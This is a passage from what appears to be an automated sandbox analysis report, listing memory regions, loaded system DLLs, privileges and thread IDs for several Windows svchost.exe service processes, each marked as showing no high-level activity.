| private_0x000000448d300000 | 0x448d300000 | 0x448d3fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000448d400000 | 0x448d400000 | 0x448d4fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000448d500000 | 0x448d500000 | 0x448d5fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ffc10000 | 0x7df5ffc10000 | 0x7ff5ffc0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff6e0778000 | 0x7ff6e0778000 | 0x7ff6e0779fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e077a000 | 0x7ff6e077a000 | 0x7ff6e077bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e077c000 | 0x7ff6e077c000 | 0x7ff6e077dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e077e000 | 0x7ff6e077e000 | 0x7ff6e077ffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0780000 | 0x7ff6e0780000 | 0x7ff6e0781fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0782000 | 0x7ff6e0782000 | 0x7ff6e0783fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0784000 | 0x7ff6e0784000 | 0x7ff6e0785fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0786000 | 0x7ff6e0786000 | 0x7ff6e0787fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0788000 | 0x7ff6e0788000 | 0x7ff6e0789fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e078a000 | 0x7ff6e078a000 | 0x7ff6e078bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e078c000 | 0x7ff6e078c000 | 0x7ff6e078dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e078e000 | 0x7ff6e078e000 | 0x7ff6e078ffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0790000 | 0x7ff6e0790000 | 0x7ff6e0791fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0792000 | 0x7ff6e0792000 | 0x7ff6e0793fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0794000 | 0x7ff6e0794000 | 0x7ff6e0795fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0796000 | 0x7ff6e0796000 | 0x7ff6e0797fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0798000 | 0x7ff6e0798000 | 0x7ff6e0799fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e079a000 | 0x7ff6e079a000 | 0x7ff6e079bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e079c000 | 0x7ff6e079c000 | 0x7ff6e079dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e079e000 | 0x7ff6e079e000 | 0x7ff6e079ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff6e07a0000 | 0x7ff6e07a0000 | 0x7ff6e089ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff6e08a0000 | 0x7ff6e08a0000 | 0x7ff6e08c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff6e08c6000 | 0x7ff6e08c6000 | 0x7ff6e08c7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e08c8000 | 0x7ff6e08c8000 | 0x7ff6e08c8fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e08ca000 | 0x7ff6e08ca000 | 0x7ff6e08cbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e08cc000 | 0x7ff6e08cc000 | 0x7ff6e08cdfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e08ce000 | 0x7ff6e08ce000 | 0x7ff6e08cffff | Private Memory | rw |
|
|
|
- |
| svchost.exe | 0x7ff6e1100000 | 0x7ff6e110cfff | Memory Mapped File | rwx |
|
|
|
- |
| dbghelp.dll | 0x7ffc3e570000 | 0x7ffc3e6f9fff | Memory Mapped File | rwx |
|
|
|
- |
| wscsvc.dll | 0x7ffc3e800000 | 0x7ffc3e82ffff | Memory Mapped File | rwx |
|
|
|
- |
| audioses.dll | 0x7ffc41b00000 | 0x7ffc41b84fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemsvc.dll | 0x7ffc496f0000 | 0x7ffc49703fff | Memory Mapped File | rwx |
|
|
|
- |
| fastprox.dll | 0x7ffc49710000 | 0x7ffc49807fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemprox.dll | 0x7ffc4a370000 | 0x7ffc4a380fff | Memory Mapped File | rwx |
|
|
|
- |
| deviceaccess.dll | 0x7ffc4d100000 | 0x7ffc4d142fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemcomn.dll | 0x7ffc4d910000 | 0x7ffc4d98efff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x7ffc4d9d0000 | 0x7ffc4daa5fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcore6.dll | 0x7ffc50920000 | 0x7ffc50967fff | Memory Mapped File | rwx |
|
|
|
- |
| cmintegrator.dll | 0x7ffc50a40000 | 0x7ffc50a4dfff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc.dll | 0x7ffc50a50000 | 0x7ffc50a69fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc6.dll | 0x7ffc50a70000 | 0x7ffc50a85fff | Memory Mapped File | rwx |
|
|
|
- |
| wcmcsp.dll | 0x7ffc50a90000 | 0x7ffc50ac5fff | Memory Mapped File | rwx |
|
|
|
- |
| wcmsvc.dll | 0x7ffc50ad0000 | 0x7ffc50b67fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcore.dll | 0x7ffc50b70000 | 0x7ffc50bccfff | Memory Mapped File | rwx |
|
|
|
- |
| wintypes.dll | 0x7ffc50c00000 | 0x7ffc50d30fff | Memory Mapped File | rwx |
|
|
|
- |
| avrt.dll | 0x7ffc50d80000 | 0x7ffc50d8afff | Memory Mapped File | rwx |
|
|
|
- |
| ksuser.dll | 0x7ffc50d90000 | 0x7ffc50d97fff | Memory Mapped File | rwx |
|
|
|
- |
| audiosrv.dll | 0x7ffc50da0000 | 0x7ffc50eb0fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7ffc511b0000 | 0x7ffc51332fff | Memory Mapped File | rwx |
|
|
|
- |
| mmdevapi.dll | 0x7ffc51340000 | 0x7ffc513b1fff | Memory Mapped File | rwx |
|
|
|
- |
| wmiclnt.dll | 0x7ffc51570000 | 0x7ffc51580fff | Memory Mapped File | rwx |
|
|
|
- |
| wevtsvc.dll | 0x7ffc51a80000 | 0x7ffc51c2afff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x7ffc51c30000 | 0x7ffc51c3afff | Memory Mapped File | rwx |
|
|
|
- |
| nrpsrv.dll | 0x7ffc51c40000 | 0x7ffc51c48fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x7ffc51c50000 | 0x7ffc51c87fff | Memory Mapped File | rwx |
|
|
|
- |
| lmhsvc.dll | 0x7ffc51c90000 | 0x7ffc51c99fff | Memory Mapped File | rwx |
|
|
|
- |
| nlaapi.dll | 0x7ffc51cb0000 | 0x7ffc51cc7fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x7ffc52640000 | 0x7ffc52652fff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7ffc52ef0000 | 0x7ffc52f16fff | Memory Mapped File | rwx |
|
|
|
- |
| fwbase.dll | 0x7ffc532b0000 | 0x7ffc532e1fff | Memory Mapped File | rwx |
|
|
|
- |
| firewallapi.dll | 0x7ffc532f0000 | 0x7ffc53371fff | Memory Mapped File | rwx |
|
|
|
- |
| gpapi.dll | 0x7ffc534a0000 | 0x7ffc534c2fff | Memory Mapped File | rwx |
|
|
|
- |
| hid.dll | 0x7ffc535d0000 | 0x7ffc535dbfff | Memory Mapped File | rwx |
|
|
|
- |
| winsta.dll | 0x7ffc53720000 | 0x7ffc53777fff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x7ffc53830000 | 0x7ffc5383bfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffc53a90000 | 0x7ffc53ac2fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7ffc53b80000 | 0x7ffc53b9efff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x7ffc53be0000 | 0x7ffc53c87fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x7ffc53dd0000 | 0x7ffc53e2cfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffc54210000 | 0x7ffc54226fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffc54280000 | 0x7ffc5428afff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ffc54320000 | 0x7ffc5434bfff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffc543a0000 | 0x7ffc543c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc543d0000 | 0x7ffc5443afff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffc54580000 | 0x7ffc54592fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffc545a0000 | 0x7ffc545e9fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7ffc545f0000 | 0x7ffc54600fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc54610000 | 0x7ffc5461efff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 18 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #53: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #53 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x358 |
| Parent PID | 0x1e4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Local Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A48
0x
918
0x
904
0x
8FC
0x
8F8
0x
8C8
0x
3A8
0x
3A4
0x
35C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x0000001518a60000 | 0x1518a60000 | 0x1518a6ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| svchost.exe.mui | 0x1518a70000 | 0x1518a70fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000001518a80000 | 0x1518a80000 | 0x1518a93fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000001518aa0000 | 0x1518aa0000 | 0x1518b1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000001518b20000 | 0x1518b20000 | 0x1518b23fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000001518b30000 | 0x1518b30000 | 0x1518b30fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000001518b40000 | 0x1518b40000 | 0x1518b41fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x1518b50000 | 0x1518c0dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000001518c10000 | 0x1518c10000 | 0x1518c10fff | Private Memory | rw |
|
|
|
- |
| private_0x0000001518c20000 | 0x1518c20000 | 0x1518c20fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000001518c30000 | 0x1518c30000 | 0x1518c30fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000001518c40000 | 0x1518c40000 | 0x1518c40fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000001518c50000 | 0x1518c50000 | 0x1518c56fff | Private Memory | rw |
|
|
|
- |
| private_0x0000001518d00000 | 0x1518d00000 | 0x1518dfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000001518e00000 | 0x1518e00000 | 0x1518e7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000001518e80000 | 0x1518e80000 | 0x1518e86fff | Private Memory | rw |
|
|
|
- |
| private_0x0000001518f00000 | 0x1518f00000 | 0x1518ffffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000001519000000 | 0x1519000000 | 0x1519187fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000001519190000 | 0x1519190000 | 0x1519310fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000001519320000 | 0x1519320000 | 0x15193dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000015193e0000 | 0x15193e0000 | 0x15194dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000015194e0000 | 0x15194e0000 | 0x15195dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000015195e0000 | 0x15195e0000 | 0x15196dffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x15196e0000 | 0x1519a16fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000001519a20000 | 0x1519a20000 | 0x1519b1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000001519b20000 | 0x1519b20000 | 0x1519c1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000001519d20000 | 0x1519d20000 | 0x1519e1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000001519f20000 | 0x1519f20000 | 0x151a01ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff230000 | 0x7df5ff230000 | 0x7ff5ff22ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff6e0622000 | 0x7ff6e0622000 | 0x7ff6e0623fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0626000 | 0x7ff6e0626000 | 0x7ff6e0627fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e062a000 | 0x7ff6e062a000 | 0x7ff6e062bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e062c000 | 0x7ff6e062c000 | 0x7ff6e062dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e062e000 | 0x7ff6e062e000 | 0x7ff6e062ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff6e0630000 | 0x7ff6e0630000 | 0x7ff6e072ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff6e0730000 | 0x7ff6e0730000 | 0x7ff6e0752fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff6e0754000 | 0x7ff6e0754000 | 0x7ff6e0755fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0756000 | 0x7ff6e0756000 | 0x7ff6e0757fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0758000 | 0x7ff6e0758000 | 0x7ff6e0759fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e075c000 | 0x7ff6e075c000 | 0x7ff6e075cfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e075e000 | 0x7ff6e075e000 | 0x7ff6e075ffff | Private Memory | rw |
|
|
|
- |
| svchost.exe | 0x7ff6e1100000 | 0x7ff6e110cfff | Memory Mapped File | rwx |
|
|
|
- |
| ssdpsrv.dll | 0x7ffc46ca0000 | 0x7ffc46ce0fff | Memory Mapped File | rwx |
|
|
|
- |
| execmodelclient.dll | 0x7ffc4b030000 | 0x7ffc4b072fff | Memory Mapped File | rwx |
|
|
|
- |
| wship6.dll | 0x7ffc4f8b0000 | 0x7ffc4f8b7fff | Memory Mapped File | rwx |
|
|
|
- |
| wshtcpip.dll | 0x7ffc4f8c0000 | 0x7ffc4f8c7fff | Memory Mapped File | rwx |
|
|
|
- |
| wshqos.dll | 0x7ffc4f8d0000 | 0x7ffc4f8d9fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc.dll | 0x7ffc50a50000 | 0x7ffc50a69fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc6.dll | 0x7ffc50a70000 | 0x7ffc50a85fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7ffc511b0000 | 0x7ffc51332fff | Memory Mapped File | rwx |
|
|
|
- |
| mmdevapi.dll | 0x7ffc51340000 | 0x7ffc513b1fff | Memory Mapped File | rwx |
|
|
|
- |
| bi.dll | 0x7ffc514f0000 | 0x7ffc514fbfff | Memory Mapped File | rwx |
|
|
|
- |
| timebrokerserver.dll | 0x7ffc51a50000 | 0x7ffc51a7cfff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x7ffc51c30000 | 0x7ffc51c3afff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x7ffc51c50000 | 0x7ffc51c87fff | Memory Mapped File | rwx |
|
|
|
- |
| coremessaging.dll | 0x7ffc52730000 | 0x7ffc527f7fff | Memory Mapped File | rwx |
|
|
|
- |
| brokerlib.dll | 0x7ffc52e40000 | 0x7ffc52e7efff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7ffc52ef0000 | 0x7ffc52f16fff | Memory Mapped File | rwx |
|
|
|
- |
| twinapi.appcore.dll | 0x7ffc52f40000 | 0x7ffc5302dfff | Memory Mapped File | rwx |
|
|
|
- |
| fwbase.dll | 0x7ffc532b0000 | 0x7ffc532e1fff | Memory Mapped File | rwx |
|
|
|
- |
| firewallapi.dll | 0x7ffc532f0000 | 0x7ffc53371fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffc53a90000 | 0x7ffc53ac2fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7ffc53b80000 | 0x7ffc53b9efff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x7ffc53dd0000 | 0x7ffc53e2cfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffc54210000 | 0x7ffc54226fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffc54280000 | 0x7ffc5428afff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ffc54320000 | 0x7ffc5434bfff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffc543a0000 | 0x7ffc543c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc543d0000 | 0x7ffc5443afff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffc54580000 | 0x7ffc54592fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffc545a0000 | 0x7ffc545e9fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc54610000 | 0x7ffc5461efff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7ffc54620000 | 0x7ffc54663fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffc54f80000 | 0x7ffc55032fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc552c0000 | 0x7ffc5535cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffc554e0000 | 0x7ffc5562dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffc55910000 | 0x7ffc559cdfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7ffc56f00000 | 0x7ffc56f07fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffc56f10000 | 0x7ffc57094fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffc571d0000 | 0x7ffc5744bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc57540000 | 0x7ffc5759afff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7ffc57900000 | 0x7ffc57968fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffc57970000 | 0x7ffc57a14fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
Process #54: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #54 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x360 |
| Parent PID | 0x1e4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeTcbPrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
2E4
0x
A78
0x
A74
0x
930
0x
91C
0x
744
0x
664
0x
660
0x
654
0x
410
0x
168
0x
40
0x
3C4
0x
3BC
0x
364
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x0000008ec7050000 | 0x8ec7050000 | 0x8ec705ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| svchost.exe.mui | 0x8ec7060000 | 0x8ec7060fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000008ec7070000 | 0x8ec7070000 | 0x8ec7083fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000008ec7090000 | 0x8ec7090000 | 0x8ec710ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000008ec7110000 | 0x8ec7110000 | 0x8ec7113fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000008ec7120000 | 0x8ec7120000 | 0x8ec7120fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000008ec7130000 | 0x8ec7130000 | 0x8ec7131fff | Private Memory | rw |
|
|
|
- |
| private_0x0000008ec7140000 | 0x8ec7140000 | 0x8ec7140fff | Private Memory | rw |
|
|
|
- |
| private_0x0000008ec7150000 | 0x8ec7150000 | 0x8ec7150fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000008ec7160000 | 0x8ec7160000 | 0x8ec7160fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000008ec7170000 | 0x8ec7170000 | 0x8ec7176fff | Private Memory | rw |
|
|
|
- |
| private_0x0000008ec7180000 | 0x8ec7180000 | 0x8ec71c3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000008ec7200000 | 0x8ec7200000 | 0x8ec72fffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x8ec7300000 | 0x8ec73bdfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000008ec73c0000 | 0x8ec73c0000 | 0x8ec747ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000008ec7480000 | 0x8ec7480000 | 0x8ec7480fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000008ec7490000 | 0x8ec7490000 | 0x8ec7490fff | Private Memory | rw |
|
|
|
- |
| private_0x0000008ec74a0000 | 0x8ec74a0000 | 0x8ec74a0fff | Private Memory | rw |
|
|
|
- |
| mmdevapi.dll.mui | 0x8ec74b0000 | 0x8ec74b0fff | Memory Mapped File | r |
|
|
|
- |
| audioendpointbuilder.dll.mui | 0x8ec74c0000 | 0x8ec74c0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000008ec74d0000 | 0x8ec74d0000 | 0x8ec74d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| sysmain.dll.mui | 0x8ec74e0000 | 0x8ec74e5fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000008ec74f0000 | 0x8ec74f0000 | 0x8ec74f6fff | Private Memory | rw |
|
|
|
- |
| private_0x0000008ec7510000 | 0x8ec7510000 | 0x8ec7516fff | Private Memory | rw |
|
|
|
- |
| private_0x0000008ec7520000 | 0x8ec7520000 | 0x8ec759ffff | Private Memory | rw |
|
|
|
- |
| pfpre_871cf952.mkd | 0x8ec75a0000 | 0x8ec75d0fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000008ec7600000 | 0x8ec7600000 | 0x8ec76fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000008ec7700000 | 0x8ec7700000 | 0x8ec7887fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000008ec7890000 | 0x8ec7890000 | 0x8ec7a10fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000008ec7a20000 | 0x8ec7a20000 | 0x8ec7b1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008ec7b20000 | 0x8ec7b20000 | 0x8ec7c1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008ec7c20000 | 0x8ec7c20000 | 0x8ec7d1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008ec7d20000 | 0x8ec7d20000 | 0x8ec7e1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008ec7ea0000 | 0x8ec7ea0000 | 0x8ec7f1ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x8ec7f20000 | 0x8ec8256fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000008ec8260000 | 0x8ec8260000 | 0x8ec835ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008ec83e0000 | 0x8ec83e0000 | 0x8ec84dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008ec84e0000 | 0x8ec84e0000 | 0x8ec85dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008ec85e0000 | 0x8ec85e0000 | 0x8ec86dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008ec86e0000 | 0x8ec86e0000 | 0x8ec87dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008ec8800000 | 0x8ec8800000 | 0x8ec88fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008ec8900000 | 0x8ec8900000 | 0x8ec89fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008ec8a00000 | 0x8ec8a00000 | 0x8ec8afffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008ec8b30000 | 0x8ec8b30000 | 0x8ec8b36fff | Private Memory | rw |
|
|
|
- |
| private_0x0000008ec8c00000 | 0x8ec8c00000 | 0x8ec8cfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008ec8d00000 | 0x8ec8d00000 | 0x8fc8cfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008fc8d00000 | 0x8fc8d00000 | 0x8fc8dfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008fc8e00000 | 0x8fc8e00000 | 0x8fc91fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008fc9200000 | 0x8fc9200000 | 0x8fc92fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008fc9300000 | 0x8fc9300000 | 0x8fc93fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008fc9450000 | 0x8fc9450000 | 0x8fc9563fff | Private Memory | rw |
|
|
|
- |
| private_0x0000008fc9600000 | 0x8fc9600000 | 0x8fc96fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008fc9700000 | 0x8fc9700000 | 0x8fc97fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008fc9800000 | 0x8fc9800000 | 0x8fc98fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008fc9a70000 | 0x8fc9a70000 | 0x8fc9a76fff | Private Memory | rw |
|
|
|
- |
| private_0x0000008fc9c00000 | 0x8fc9c00000 | 0x8fc9cfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008fc9e00000 | 0x8fc9e00000 | 0x8fc9efffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008fc9f00000 | 0x8fc9f00000 | 0x8fc9ffffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008fca000000 | 0x8fca000000 | 0x8fca0fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008fca200000 | 0x8fca200000 | 0x8fca2fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008fca400000 | 0x8fca400000 | 0x8fca4fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008fca600000 | 0x8fca600000 | 0x8fca6fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008fca700000 | 0x8fca700000 | 0x8fca7fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008fca800000 | 0x8fca800000 | 0x8fca8fffff | Private Memory | rw |
|
|
|
- |
